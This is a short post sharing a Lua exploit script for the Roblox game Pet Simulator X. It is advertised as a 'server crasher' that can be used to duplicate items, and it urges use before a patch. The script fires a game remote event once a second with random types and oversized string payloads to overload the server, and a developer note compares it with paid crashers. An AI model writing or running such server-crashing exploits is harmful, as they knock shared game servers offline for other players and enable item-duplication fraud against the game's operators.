Pet Simulator X Script | NEW SERVER CRASHER, CAN BE USED TO DUPE, USE BEFORE PATCH!

Created by Bluwu#3621

Features:

  • NEW SERVER CRASHER
  • CAN BE USED TO DUPE
    • Go to YouTube and find old duping guides with server crashes (the same method applies here)
  • DEV NOTES:
  • I made this just cause people were using a shitty way to crash it and selling the same open sourced script for 15$ each (they were using a huge string of chinese characters with no randomization).
local createRemote = workspace:WaitForChild("__THINGS"):WaitForChild("__REMOTES"):WaitForChild("MAIN")
local remoteTypes = {"a","b","c","e"}
while task.wait(1) do
    createRemote:FireServer(remoteTypes[math.random(#remoteTypes)],tostring(tick()):rep(100))
end